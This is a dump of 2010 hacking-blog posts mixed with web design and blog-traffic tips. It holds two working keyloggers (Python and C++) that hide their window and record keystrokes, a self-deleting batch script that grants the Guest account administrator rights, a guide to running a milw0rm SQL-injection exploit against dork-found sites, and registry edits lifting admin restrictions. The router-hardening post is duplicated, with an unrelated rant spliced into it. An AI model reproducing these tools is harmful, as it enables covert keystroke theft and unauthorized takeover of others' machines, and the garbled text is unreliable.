Freealldown

Things you should know before you want to learn to hack

2010-03-15T08:06:00.000+05:30

To get it out there, every damn forum, IRC channel or medium that is dedicated to the hacking and hacker universe has at least recieved this question once in it’s lifetime.

“How do I Hack?”

Look familiar? Well sure it does, because at one point in time we all have asked either ourselves or someone else this very question. Now the difference is how each of us turned out and learned along the way to the answer. I’m going to assume that this question is forged for hacking computer systems and bypassing security. For anyone looking to go out and ask this question to people they don’t know, let me give you some advice so save yourself some hassle and even from getting flamed.
Read. You want to know as much as you can about the way the internet works and the technology that drives it. Specifically I would start with some old school texts from textfiles.com. Also reading this is a great start, albeit one of the best. Get books, sometimes reading a computer screen for so long can get nostalgic or boring, pick up a book and read it.
Get Linux and get away from Windows. Learn it.Period.
Start teaching yourself a programming language. Assembly is a start, even C++ or Java are good ones. Web languages are great to start with as well, because they are fast to learn, and can push you into understanding basic concepts around the higher-end languages.
Get in with a good forum or group of people that will help you. I recommend suck-o.com, not because I frequent it myself, but because it is a place with people who are willing to teach you as much as they know themselves.
Setup your own testing environment, either virtually (ie VMware) or a 2 computer isolated network.
Start applying and testing the things that you’ve learned to your test environment, and make notes of your progress.

Now Hacking is a broad term, and I hate to have this post seem as if hacking only applies to computer systems, because it doesn’t. It can apply to almost every facet of life we experience daily, all it takes is some ingenuity and a will to hack something.

An Introduction to Web Hacking – Part 1: Vulnerabilities and Milw0rm

2010-03-15T07:52:00.000+05:30

This article is to introduce you to common website vulnerabilities and exploiting. As a beginner we will cover a variety of topics that will explain some of the most common and useful vulnerabilities of websites as well as showing you how to find the vulnerabilities and exploit them. You should at least be familiar with using a computer, browsing the internet as well as know how to identify programming languages. I personally use Linux but I am going to assume you use Microsoft Windows, which it really isn’t going to make a difference at this point. However to start in this article I will talk about types of vulnerabilities, and how to use a site such as milw0rm.com to exploit a vulnerable site.

So to begin let me start by explaining common vulnerabilities you will come across on the web. These are some of the most common and most talked about vulnerabilities and are widely explained about on the web. I however am going to do my best to explain these in best possible way for you to understand. Let’s dive in!

XSS/CSS or Cross Site Scripting is one of many common vulnerabilities that can be found within web applications on the internet, we hear of this term frequently in web application security, as it is probably one of the most tested for vulnerabilities along side of SQL Injection. Do not confuse CSS in this article for Cascading Style Sheets which is the preferred acronym for that technology. I will be using the preferred XSS to identify Cross Site Scripting. XSS is a form of code-injection into a web page that is viewable by other web surfers. There are 3 primary types that are used: persistent, non persistent and DOM based. I will not dwell on explaining each of these types of XSS attacks. In identifying them however I will note which type it is for your reference.

SQL Injection much like XSS (injection) this vulnerability has to do with the database part of a website. The vulnerability is commonly found within web applications that do not properly filter user inputted data. Say you have a website that allows users to post comments on the site, if the data you submit to make a comment includes code/calls to the database when you submit it, and the website does not filter out that code, you will likely be able to grab/display or modify the database entries of the website. A couple forms of SQL injection include Blind SQL injection and incorrect type handling.

LFI and RFI stands for Local File Inclusion and Remote File Inclusion respectively. The first LFI allows for a user to execute a file located on the server hosting the website. An example would be a user using a file upload for images to upload a malicious script, and then executing the file after it uploads. RFI on the other hand allows for a user to execute a script that is not stored on the server but stored on another server or computer.

For the next part of this article I assume you don’t know what milw0rm.com is and how to use it. Milw0rm is one of the best sites in my opinion to find exploits. Since most of the vulnerabilities I have explained above are for web applications we will be looking at the web app section of milw0rm.com. You will notice that using milw0rm is pretty self-explanatory, the only reason I am writing about it however is because I have encountered many people who have absolutely no idea what to do there, or how to use the exploits there.

Goto http://www.milw0rm.com/webapps.php

This page shows exploits made for web applications, it shows the date which is important because when an exploit is found the developers for that application will hurry to close the vulnerability. At the time of this article I will be looking at exploits submitted on February 10th – 11th, 2008 which will be the most current submitted exploits. Lets look at http://www.milw0rm.com/exploits/5099 which is an exploit for Mix Systems Content Management System(CMS). This specific exploit is written in PHP and takes advantage of an SQL injection exploit remotely. Identifying the type of programming used for the exploit is important of course, normally you can identify the the code at the beginning of the script, some use PHP, others PERL, some PYTHON, it just depends what the author chose to use. Some exploits also give you instructions to use the specific script. The Mix Systems CMS exploit explains a usage scenario, since I will be using Terminal/command line to run the script instead of a browser this is the output I get when I run: php 5099.php

Usage: php 5099.php host type num_records
host: Your target ex www.target.com
type: 1 – plugin=katalog bug
2 – plugin=photogall bug
num_records: number or returned records(if 0 – return all)
example: php script.php site.com 10

It explains that in terminal I would type something such as php 5099.php host type num_records to command the execution of the script to perform the exploit on a defined website, the exploitable area of the site and the number of records to return/display, pretty easy right! So now you have to find a vulnerable website that makes use of Mix Systems CMS, this can be easily done using a Search Engine Dork (sometimes the exploits will give you a Dork you can use).

Well this is the end of Part 1 of An Introduction to Web Hacking – Vulnerabilities and Milw0rm. Please remember that milw0rm is not the only site to offer exploits and that these are not the only vulnerabilities that are available to find. Do some reading and research and stay tuned for the next article in this series. Cheers!

Writing KeyLoggers

2010-03-15T07:51:00.000+05:30

How to Write a software Keylogger

According to wiki key loggers perform the following

Keystroke logging (often called keylogging) is a method of capturing and recording user keystrokes.

Although now a days you would also want to capture mouse events. I won’t be getting into mouse hooks in this tutorial. Some one else can do that if they like. The language I will use will be python obviously not the best choice but you can convert it into your desired language: C, Java or whatever.

My First example: A Module designed for this purpose:

A lot of languages will have key logging modules already available for use, python has one called PyHook. Here is an example of PyHook

import pythoncom, pyHook

def OnKeyboardEvent(event):
print event.Key
return True

# create a hook manager
hm = pyHook.HookManager()
# watch for all key events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()

We import our modules then create a function and pass it an event parameter what this does is tell python an event should occur (in this case our keyboard input)

We then call our pyHook functions to listen for our keyboard input.

Wow a keylogger in about 8 – 20 lines of code

Next we can move on to win api

import win32api
import win32console
import win32gui
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)
try:
mylog_file = open("/HOME/output.txt","a")
except IOError:
print "Error grabbing file"
else:
while 1:
for i in range(32, 256):
keyit = win32api.GetAsyncKeyState(i)
if keyit == -32767:
keyEnd = 81
mylog_file.write(chr(i))
if i == keyEnd:
mylog_file.close()
keyin = open("/HOME/output.txt","r")
data = keyin.read()

Ok this is a bit more drastic code with some extras. If you don’t know what winapi is I suggest you read up on it. It will give you a lot of insight into coding

import necessary modules

import win32api
import win32console
import win32gui

we then hide the console window

win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win, 0)

try and open a file for logging. Python tends to automagically create one if it’s not there

try:
mylog_file = open("/HOME/output.txt","a")
except IOError:
print "Error grabbing file"

get our range of Keys and call the winapi GetAsyncKeyState Function what this does according to microsoft

The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

for i in range(32, 256):
keyit = win32api.GetAsyncKeyState(i)

If Shift Q is pressed log data to File

keyEnd = 81
mylog_file.write(chr(i))
if i == keyEnd:
mylog_file.close()
keyin = open("/HOME/output.txt","r")
data = keyin.read()

Alright that wasn’t so bad was it

This is just code to be a starting point I do not say these ways are the best or only ways its more or less meant as a very basic introduction to coding keyloggers

Next article (Sending keystrokes over the network)

Resources

Wiki http://en.wikipedia.org/wiki/Keystroke_logging
PyHook http://pyhook.wiki.sourceforge.net/
GetAsyncKeyState http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx

How to secure your router in 11 steps!

2010-03-15T07:45:00.000+05:30

This is a tutorial I wrote some time ago on how to secure your router. You can find many similar tutorials on the net but I dare say that mine is a bit more detailed and extensive. I have included a special section on firewall rules that I have not see else where.

So if you have any questions let me know and I can help you out. A good firewalled router is one of the best measures that you can take to protect your comptuer and network.

So this are my 11 steps to securing your Internet network. Although 11 steps may seem a lot it should not take you more than half an hour to do all of this. If you have tackled this issue before this should be just fun. If you are struggling with any part of this feel free to ask or PM me. Any way this tutorial has been written for info/sec minded people so I do not think that there should be any problem.

For all those who are not sure whether this is relevant to them let me say this. The router if you have one of course is the first line of defense against any possible intruders. A router with default configuration is a lot easier to hack than one that has been properly configured. Of course the hacker needs to know your IP to hack you and if you use proxies for all your Internet activities than that is great but if you like many others use torrents or like me run a tor relay than your IP is public knowledge and in the case of a static IP you can not just change when ever you want to.

I have seen girls cry on youtube videos because a hacker penetrated there firewall and deleted all the stuff they had on the computer. It is not a pleasant sight and if you do not want to be another victim of hackers this tutorial is a pretty good start to protecting your computer and your network.

1. Update your firmware

If your router is old you need to update your firmware. How to do that you may ask? Well the first thing is that you need to do is figure out what is the name and model of the router. Than Google it and you will find the site of the manufacturer of your router. Very likely they have the new firmware you are looking for.

2. Use a strong password

If you still have the default password than I think this is one of the first things that you need to address. A strong password should be at least six characters long and should contain random letters and numbers. I recommend you to use some tool that would generate a pass phrase for you but if not try to use some 1337 language.

3. Disable upNp

Once that you have a working router and do not plan to connect any other devices to it like switches or any thing else you do not need it any more. Hackers could use this service as described on this site: http://www.gnucitizen.org/blog/hacking-the-interwebs

4. Disable ping on the wan side

Plain and simple!

5. Use protocol filters

The following is taken from the following e-book: Router Security Configuration Guide 1.1 c.This e-book is publicly accessible on the following site: http://www.nsa.gov/snac/downloads_all.cfm

3 (TCP & UDP) tcpmux
7 (TCP & UDP) echo
9 (TCP & UDP) discard
11 (TCP) systat
13 (TCP & UDP) daytime
15 (TCP) netstat
19 (TCP & UDP) chargen
37 (TCP & UDP) time
43 (TCP) whois
67 (UDP) bootp
69 (UDP) tftp
95 (TCP & UDP) supdup
111 (TCP & UDP) sunrpc
135 (TCP & UDP) loc-srv
137 (TCP & UDP) netbios-ns
138 (TCP & UDP) netbios-dgm
139 (TCP & UDP) netbios-ssn
177 (UDP) xdmcp
445 (TCP) netbios (ds)
512 (TCP) rexec
515 (TCP) lpr
517 (UDP) talk
518 (UDP) ntalk
540 (TCP) uucp
1434 (UDP) Microsoft SQL Server
1900, 5000 (TCP & UDP) Microsoft UPnP SSDP
2049 (UDP) NFS
6000 – 6063 (TCP) X Window System
6667 (TCP) IRC
12345-6 (TCP) NetBus
31337 (TCP & UDP) Back Orifice

6. Disable DHCP

You would want to set static LAN IP’s on all of the computers that are using your router. After that you can disable the DHCP service.

7. Set firewall rules

The following is an excerpt from the e-book. You will find the following paragraphs on p.40:

• Reject all traffic from the internal networks that bears a source IP address
which does not belong to the internal networks. (Legitimate traffic
generated by sources on the internal networks will always bear a source
address within the range or ranges assigned to the internal networks; any
other traffic is attempting to claim a bogus source address, and is almost
certainly erroneous or malicious in nature.)

• Reject all traffic from the external networks that bears a source address
belonging to the internal networks. (Assuming that addresses are assigned
correctly, traffic sent from the external networks should always bear a
source address from some range other than those assigned to the internal
networks. Traffic bearing such spoofed addresses is often part of an
attack, and should be dropped by a border router.)

• Reject all traffic with a source or destination address belonging to any
reserved, unroutable, or illegal address range.

Now what does all of this mean you may ask? Well for a non-techie like me I was not sure either so I had to ask as well. Basically what it means is that you have to disable all connections coming from the outside (WAN) to the inside (LAN). So what do you need to do? You have to deny the following IP range: 192.168.1.0-192.168.1.255. Unless you are using remote asses option on your router you should implement this!

Next thing that you need to do is to prevent all internal IP ranges to connect to the out side that of course are not in use by any of the computers. So for instance if you have five computers using the 192.168.1.2-192.168.1.5 range than you should block all the other internal IP ranges. So in this case it would be 192.168.1.5-192.168.1.255 and do not forget the 192.168.1.0 LAN IP as well. You of course need the 192.168.1.1 to connect to the router because if you restrict your self from it than you would have to reset your router and start all over again.

8. Change the name of your router

Just do it!

9. Use MAC filters

Figure out all the MAC addresses of the computers that are using your router. Simply add them to the list and allow only those to use your router.

10. Use SSH to connect to the router

The last part is to use a secure way to communicate with your router. A good idea is to use SSH!

11. WIFI

If you are using WIFI you need to use some form of Encryption like Speaking for my self I found that the more I used windows the less I liked them. Until it came to the point that every day it was almost painful to turn on the computer and work on windows. Yeah, the games are great and it is easy to install programs but that is pretty much all it has to offer. So if you can manage with out your games for a while you do not really need windows at all. Sure it is difficult some times to install some applications of linux but most of the time you can use the applications that are already on your OS or you can use the GUI, package manager or Yast to install programs on it. Learning how to install from source is not that difficult and if you run into problems I just see it as a chalange. Maybe you find a bug and you can report it and in a way you are helping out the community. In windows there is no such thing, Probably they do not even look at the issue you are having. I do not think they care. They work for money and not necesarily to make people happy.

So this are my 11 steps to securing your Internet network. Although 10 steps may seem a lot it should not take you more than half an hour to do all of this. If you have tackled this issue before this should be just fun. If you are struggling with any part of this feel free to ask or PM me. Any way this tutorial has been written for info/sec minded people so I do not think that there should be any problem.

For all those who are not sure whether this is relevant to them let me say this. The router if you have one of course is the first line of defense against any possible intruders. A router with default configuration is a lot easier to hack than one that has been properly configured. Of course the hacker needs to know your IP to hack you and if you use proxies for all your Internet activities than that is great but if you like many others use torrents or like me run a tor relay than your IP is public knowledge and in the case of a static IP you can not just change when ever you want to.

I have seen girls cry on youtube videos because a hacker penetrated there firewall and deleted all the stuff they had on the computer. It is not a pleasant sight and if you do not want to be another victim of hackers this tutorial is a pretty good start to protecting your computer and your network.

1. Update your firmware

If your router is old you need to update your firmware. How to do that you may ask? Well the first thing is that you need to do is figure out what is the name and model of the router. Than Google it and you will find the site of the manufacturer of your router. Very likely they have the new firmware you are looking for.

2. Use a strong password

If you still have the default password than I think this is one of the first things that you need to address. A strong password should be at least six characters long and should contain random letters and numbers. I recommend you to use some tool that would generate a pass phrase for you but if not try to use some 1337 language.

3. Disable upNp

Once that you have a working router and do not plan to connect any other devices to it like switches or any thing else you do not need it any more. Hackers could use this service as described on this site: http://www.gnucitizen.org/blog/hacking-the-interwebs

4. Disable ping on the wan side

Plain and simple!

5. Use protocol filters

The following is taken from the following e-book: Router Security Configuration Guide 1.1 c.This e-book is publicly accessible on the following site: http://www.nsa.gov/snac/downloads_all.cfm

3 (TCP & UDP) tcpmux
7 (TCP & UDP) echo
9 (TCP & UDP) discard
11 (TCP) systat
13 (TCP & UDP) daytime
15 (TCP) netstat
19 (TCP & UDP) chargen
37 (TCP & UDP) time
43 (TCP) whois
67 (UDP) bootp
69 (UDP) tftp
95 (TCP & UDP) supdup
111 (TCP & UDP) sunrpc
135 (TCP & UDP) loc-srv
137 (TCP & UDP) netbios-ns
138 (TCP & UDP) netbios-dgm
139 (TCP & UDP) netbios-ssn
177 (UDP) xdmcp
445 (TCP) netbios (ds)
512 (TCP) rexec
515 (TCP) lpr
517 (UDP) talk
518 (UDP) ntalk
540 (TCP) uucp
1434 (UDP) Microsoft SQL Server
1900, 5000 (TCP & UDP) Microsoft UPnP SSDP
2049 (UDP) NFS
6000 – 6063 (TCP) X Window System
6667 (TCP) IRC
12345-6 (TCP) NetBus
31337 (TCP & UDP) Back Orifice

6. Disable DHCP

You would want to set static LAN IP’s on all of the computers that are using your router. After that you can disable the DHCP service.

7. Set firewall rules

The following is an excerpt from the e-book. You will find the following paragraphs on p.40:

• Reject all traffic from the internal networks that bears a source IP address
which does not belong to the internal networks. (Legitimate traffic
generated by sources on the internal networks will always bear a source
address within the range or ranges assigned to the internal networks; any
other traffic is attempting to claim a bogus source address, and is almost
certainly erroneous or malicious in nature.)

• Reject all traffic from the external networks that bears a source address
belonging to the internal networks. (Assuming that addresses are assigned
correctly, traffic sent from the external networks should always bear a
source address from some range other than those assigned to the internal
networks. Traffic bearing such spoofed addresses is often part of an
attack, and should be dropped by a border router.)

• Reject all traffic with a source or destination address belonging to any
reserved, unroutable, or illegal address range.

Now what does all of this mean you may ask? Well for a non-techie like me I was not sure either so I had to ask as well. Basically what it means is that you have to disable all connections coming from the outside (WAN) to the inside (LAN). So what do you need to do? You have to deny the following IP range: 192.168.1.0-192.168.1.255. Unless you are using remote asses option on your router you should implement this!

Next thing that you need to do is to prevent all internal IP ranges to connect to the out side that of course are not in use by any of the computers. So for instance if you have five computers using the 192.168.1.2-192.168.1.5 range than you should block all the other internal IP ranges. So in this case it would be 192.168.1.5-192.168.1.255 and do not forget the 192.168.1.0 LAN IP as well. You of course need the 192.168.1.1 to connect to the router because if you restrict your self from it than you would have to reset your router and start all over again.

8. Change the name of your router

Just do it!

9. Use MAC filters

Figure out all the MAC addresses of the computers that are using your router. Simply add them to the list and allow only those to use your router.

10. Use SSH to connect to the router

The last part is to use a secure way to communicate with your router. A good idea is to use SSH!

11. WIFI

If you are using WIFI you need to use some form of Encryption like WPA2 and use a strong password. I personally prefer using cables but that is just me!

Of course this is no guarantee that some skilled hacker could not hack you. If you are really concerned about this you could try and put another hardware firewall behind the router in the shape of an old computer running smoothwall or IPcop.

Nevertheless if you followed this instructions you should have a pretty good level of security. I have done all of these things on my router and they work so I am sure they will work on yours too.

P.S.This tutorial has been written by lyecdevf. If you choose to post it on other forums please give credit!
and use a strong password. I personally prefer using cables but that is just me!

Of course this is no guarantee that some skilled hacker could not hack you. If you are really concerned about this you could try and put another hardware firewall behind the router in the shape of an old computer running smoothwall or IPcop.

Nevertheless if you followed this instructions you should have a pretty good level of security. I have done all of these things on my router and they work so I am sure they will work on yours too.

P.S.This tutorial has been written by lyecdevf.

43 Web design mistakes you should avoid

2010-03-13T15:22:00.002+05:30

There are several lists of web design mistakes around the Internet. Most of them, however, are the “Most common” or “Top 10” mistakes. Every time I crossed one of those lists I would think to myself: “Come on, there must be more than 10 mistakes…”. Then I decided to write down all the web design mistakes that would come into my head; within half an hour I had over thirty of them listed. Afterwards I did some research around the web and the list grew to 43 points.

The next step was to write a short description for each one, and the result is the collection of mistakes that you will find below. Some of the points are common sense, others are quite polemic. Most of them apply to any website though, whether we talk about a business entity or a blog. Enjoy!

1. The user must know what the site is about in seconds: attention is one the most valuable currencies on the Internet. If a visitor can not figure what your site is about in a couple of seconds, he will probably just go somewhere else. Your site must communicate why I should spend my time there, and FAST!

2. Make the content scannable: this is the Internet, not a book, so forget large blocks of text. Probably I will be visiting your site while I work on other stuff so make sure that I can scan through the entire content. Bullet points, headers, subheaders, lists. Anything that will help the reader filter what he is looking for.

3. Do not use fancy fonts that are unreadable: sure there are some fonts that will give a sophisticated look to your website. But are they readable? If your main objective is to deliver a message and get the visitors reading your stuff, then you should make the process comfortable for them.

4. Do not use tiny fonts: the previous point applies here, you want to make sure that readers are comfortable reading your content. My Firefox does have a zooming feature, but if I need to use on your website it will probably be the last time I visit it.

5. Do not open new browser windows: I used to do that on my first websites. The logic was simple, if I open new browser windows for external links the user will never leave my site. WRONG! Let the user control where he wants the links to open. There is a reason why browsers have a huge “Back” button. Do not worry about sending the visitor to another website, he will get back if he wants to (even porn sites are starting to get conscious regarding this point lately…).

6. Do not resize the user’s browser windows: the user should be in control of his browser. If you resize it you will risk to mess things up on his side, and what is worse you might lose your credibility in front of him.

7. Do not require a registration unless it is necessary: lets put this straight, when I browse around the Internet I want to get information, not the other way around. Do not force me to register up and leave my email address and other details unless it is absolutely necessary (i.e. unless what you offer is so good that I will bear with the registration).

8. Never subscribe the visitor for something without his consent: do not automatically subscribe a visitor to newsletters when he registers up on your site. Sending unsolicited emails around is not the best way to make friends.

9. Do not overuse Flash: apart from increasing the load time of your website, excessive usage of Flash might also annoy the visitors. Use it only if you must offer features that are not supported by static pages.

10. Do not play music: on the early years of the Internet web developers always tried to successfully integrate music into websites. Guess what, they failed miserably. Do not use music, period.

11. If you MUST play an audio file let the user start it: some situations might require an audio file. You might need to deliver a speech to the user or your guided tour might have an audio component. That is fine. Just make sure that the user is in control, let him push the “Play” button as opposed to jamming the music on his face right after he enters the website.

12. Do not clutter your website with badges: first of all, badges of networks and communities make a site look very unprofessional. Even if we are talking about awards and recognition badges you should place them on the “About Us” page.

13. Do not use a homepage that just launches the “real” website: the smaller the number of steps required for the user to access your content, the better.

14. Make sure to include contact details: there is nothing worse than a website that has no contact details. This is not bad only for the visitors, but also for yourself. You might lose important feedback along the way.

15. Do not break the “Back” button: this is a very basic principle of usability. Do not break the “Back” button under any circumstance. Opening new browser windows will break it, for instance, and some Javascript links might also break them.

16. Do not use blinking text: unless your visitors are coming straight from 1996, that is.

17. Avoid complex URL structures: a simple, keyword-based URL structure will not only improve your search engine rankings, but it will also make it easier for the reader to identify the content of your pages before visiting them.

18. Use CSS over HTML tables: HTML tables were used to create page layouts. With the advent of CSS, however, there is no reason to stick to them. CSS is faster, more reliable and it offers many more features.

19. Make sure users can search the whole website: there is a reason why search engines revolutionized the Internet. You probably guessed it, because they make it very easy to find the information we are looking for. Do not neglect this on your site.

20. Avoid “drop down” menus: the user should be able to see all the navigation options straight way. Using “drop down” menus might confuse things and hide the information the reader was actually looking for.

21. Use text navigation: text navigation is not only faster but it is also more reliable. Some users, for instance, browse the Internet with images turned off.

22. If you are linking to PDF files disclose it: ever clicked on a link only to see your browser freezing while Acrobat Reader launches to open that (unrequested) PDF file? That is pretty annoying so make sure to explicit links pointing to PDF files so that users can handle them properly.

23. Do not confuse the visitor with many versions: avoid confusing the visitor with too many versions of your website. What bandwidth do I prefer? 56Kbps? 128Kbps? Flash or HTML? Man, just give me the content!

24. Do not blend advertising inside the content: blending advertising like Adsense units inside your content might increase your click-through rate on the short term. Over the long run, however, this will reduce your readership base. An annoyed visitor is a lost visitor.

25. Use a simple navigation structure: sometimes less is more. This rule usually applies to people and choices. Make sure that your website has a single, clear navigation structure. The last thing you want is to confuse the reader regarding where he should go to find the information he is looking for.

26. Avoid “intros”: do not force the user to watch or read something before he can access to the real content. This is plain annoying, and he will stay only if what you have to offer is really unique.

27. Do not use FrontPage: this point extends to other cheap HTML editors. While they appear to make web design easier, the output will be a poorly crafted code, incompatible with different browsers and with several bugs.

28. Make sure your website is cross-browser compatible: not all browsers are created equal, and not all of them interpret CSS and other languages on the same way. Like it or not, you will need to make your website compatible with the most used browsers on the market, else you will lose readers over the long term.

29. Make sure to include anchor text on links: I confess I used to do that mistake until some time ago. It is easier to tell people to “click here”. But this is not efficient. Make sure to include a relevant anchor text on your links. It will ensure that the reader knows where he is going to if he clicks the link, and it will also create SEO benefits for the external site where the link is pointing.

30. Do not cloak links: apart from having a clear anchor text, the user must also be able to see where the link is pointing on the status bar of his browser. If you cloak your links (either because they are affiliate ones or due to other reasons) your site will lose credibility.

31. Make links visible: the visitor should be able to recognize what is clickable and what is not, easily. Make sure that your links have a contrasting color (the standard blue color is the optimal most of the times). Possibly also make them underlined.

32. Do not underline or color normal text: do not underline normal text unless absolutely necessary. Just as users need to recognize links easily, they should not get the idea that something is clickable when in reality it is not.

33. Make clicked links change color: this point is very important for the usability of your website. Clicked links that change color help the user to locate himself more easily around your site, making sure that he will not end up visiting the same pages unintentionally.

34. Do not use animated GIFs: unless you have advertising banners that require animation, avoid animated GIFs. They make a site look unprofessional and detract the attention from the content.

35. Make sure to use the ALT and TITLE attributes for images: apart from having SEO benefits the ALT and TITLE attributes for images will play an important role for blind users.

36. Do not use harsh colors: if the user is getting a headache after visiting your site for 10 consecutive minutes, you probably should pick a better color scheme. Design the color palette around your objectives (i.e. deliver a mood, let the user focus on the content, etc.).

37. Do not use pop ups: this point refers to pop ups of any kind. Even user requested pop ups are a bad idea given the increasing amount of pop blockers out there.

38. Avoid Javascript links: those links execute a small Javascript when the user clicks on them. Stay away from them since they often create problems for the user.

39. Include functional links on your footer: people are used to scrolling down to the footer of a website if they are not finding a specific information. At the very least you want to include a link to the Homepage and possibly a link to the “Contact Us” page.

40. Avoid long pages: guess what, if the user needs to scroll down forever in order to read your content he will probably just skip it altogether. If that is the case with your website make it shorter and improve the navigation structure.

41. No horizontal scrolling: while some vertical scrolling is tolerable, the same can not be said about horizontal scrolling. The most used screen resolution nowadays is 1024 x 768 pixels, so make sure that your website fits inside it.

42. No spelling or grammatical mistakes: this is not a web design mistake, but it is one of the most important factors affecting the overall quality of a website. Make sure that your links and texts do not contain spelling or grammatical mistakes.

43. If you use CAPTCHA make sure the letters are readable: several sites use CAPTCHA filters as a method of reducing spam on comments or on registration forms. There is just one problem with it, most of the times the user needs to call his whole family to decipher the letters.

4 Steps to Increase Your Blog Traffic

2010-03-13T15:22:00.001+05:30

One of the most common complaints that I hear from bloggers is the fact that no matter how hard they try, they can’t grow their blogs past 100 or so daily page vies. Those early days are indeed the hardest, because you need to put hard work in without the certainty of achieving results.

If you are in that same situation, here is a simple strategy that will certainly increase your blog traffic and make you break the 1,000 daily page views mark. In fact, the strategy could be used even if your are already over that number but have reached a traffic plateau lately.

Just make sure to execute the 4 steps as planned and to spend the two hours and a half every day (obviously if you have more time available you can expand the time spent on each of the four steps proportionally).

First Step: Killer Articles (1 hour per day)

Spend one hour brainstorming, researching and writing killer articles (also called linkbaits, pillar articles and so on).

Notice that your goal is to release one killer article every week. If that is not possible aim for one every 15 days. So the one hour that you will spend every day will be dedicated to the same piece. In other words, expect killers articles to take from 5 up to 10 hours of work.

If you are not familiar with the term, a killer article is nothing more than a long and structured article that has the goal of delivering a huge amount of value to potential visitors. If you have a web design blog, for example, you could write an article with “100 Free Resources for Designers”. Here are some ideas for killer articles:

* create a giant list of resources,
* write a detailed tutorial teaching people how to do something,
* find a solution for a common problem in your niche and write about it, or
* write a deep analysis on a topic where people have only talked superficially

When visitors come across your killer article, you want them to have the following reaction: “Holy crap! This is awesome. I better bookmark it. Heck, I better even mention this on my site and on my Twitter account, to let my readers and friends know about it.”

Second Step: Networking (30 minutes per day)

Networking is essential, especially when you are just getting started. The 30 minutes that you will dedicate to it every day could be split among:

* commenting on other blogs in your niche,
* linking to the posts of bloggers in your niche, and
* interacting with the bloggers in your niche via email, IM or Twitter.

Remember that your goal is to build genuine relationships, so don’t approach people just because you think they can help to promote your blog. Approach them because you respect their work and because you think the two of you could grow together.

Third Step: Promotion (30 minutes per day)

The first activity here is the promotion of your killer articles. Whenever you publish one of them, you should push it in any way you can. Examples include:

* letting the people in your network know about it (don’t beg for a link though),
* letting bloggers and webmasters in relevant niches know about it,
* getting some friends to submit the article to social bookmarking sites,
* getting some friends to Twitter the article, and
* posting about the article in online forums and/or newsgroups.

If there is time left, spend it with search engine optimization, social media marketing and activities to promote your blog as whole. Those can range from keyword research to promoting your blog on Facebook and guest blogging.

Fourth Step: Normal Posts (30 minutes per day)

Just like a man does not live by bread alone, a blog does not live by killer articles alone. Normal posts are the ones that you will publish routinely in your blog, between the killer articles. For example, you could publish a killer article every Monday and normal posts from Tuesday through Friday. Here are some ideas for normal posts:

* a post linking to an article on another blog and containing your opinion about it
* a post informing your readers about a news in your niche
* a post asking a question to your readers and aiming to initiate a discussion
* a post highlighting a new resource or trick that you discovered and that would be useful to your readers

While killers articles are essential to promote your blog and bring new readers aboard, normal posts are the ones that will create diversity in your content and keep your readers engaged.

Hacking ADMIN privileges from Guest/User account

2010-03-13T15:16:00.000+05:30

Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.

HaCk "GUEST" with Admin privileges........

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

if you find this post working please comment.

Hiding Command Prompt

2010-03-13T15:13:00.000+05:30

I had an issue running a private World of Warcraft server, there were to many open command windows on my PC which I also use for development. Here is a solution which I found.

Head over to:

http://www.commandline.co.uk/cmdow/

to get a list of Windows open in particular there handles


cmdow.exe /T

In my case I wanted the handle the command(cmd) windows which were open

Let’s hide em’


cmdow.exe handle /hid

cheers

C++ Local Key Logger

2010-03-13T15:12:00.001+05:30

Here is a simple example keylogger code written in C

it has the ability to hide the cmd window

have fun

#include
#include
#include
#define _WIN32_WINNT 0×0500
#include

using namespace std;

int main(int argc, char *argv[])
{
HWND win;
win = GetConsoleWindow();
ShowWindow(win, SW_HIDE);
ofstream myfile;
myfile.open(“C:\\keys.txt”);
while (1) {
int i;
short keyit;
for (i = 32; i <= 256; i++) {
keyit = GetAsyncKeyState(i);
if (keyit == -32767) {
int keyEnd;
keyEnd = 81;
myfile << char(i);
if (i == keyEnd) {
myfile.close();
}
}
}
}
return 0;
}

Basics of Hacking

2010-03-13T15:03:00.001+05:30

Getting Ip's:--
To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Type netstat -r at the command prompt to see the ip of all computers you are connected to.
In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.
When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are seperated by a : . Different programs use different ports, so you can work out which ip's are from which program.
Connecting to other computers and what ports are:--
Servers send information. Clients retrieve. Simple. Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system.
Ports are doors into computers. Hosts are computer names (ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to.
You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet. Type www.yahoo.com as the host and port as 80 the click connect. If nothing happens, you're in. Wow. You are connected to Yahoo's server. You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.
Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)

Allowing dos and regedit in a restricted Windows:
A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:
REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKE_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0
Save it as something.reg then run it. Simple.

Proxies:
